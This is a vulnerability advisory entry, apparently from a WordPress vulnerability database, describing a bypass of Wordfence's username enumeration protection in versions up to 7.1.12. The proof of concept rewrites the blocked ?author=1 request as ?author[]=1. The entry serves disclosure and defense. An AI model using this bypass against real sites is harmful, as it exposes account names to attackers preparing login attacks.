Wordfence <= 7.1.12 - Username Enumeration Prevention Bypass



Proof of Concept
Wordfence blocks:

http://www.example.com/?author=1

But allowed:

http://www.example.com/?author[]=1

Affects Plugin

References

PacketStorm 149845
URL http://www.waraxe.us/advisory-109.html

Classification

Type BYPASS

Miscellaneous

Original Researcher Janek Vind "waraxe"
Submitter Ryan Dewhurst
Submitter Website https://dewhurstsecurity.com/
Submitter Twitter ethicalhack3r
Views 17313
Verified Yes
WPVDB ID 9135

Timeline

Publicly Published 2018-10-02 (almost 2 years ago)
Added 2018-10-18 (over 1 year ago)
Last Updated 2019-11-01 (8 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin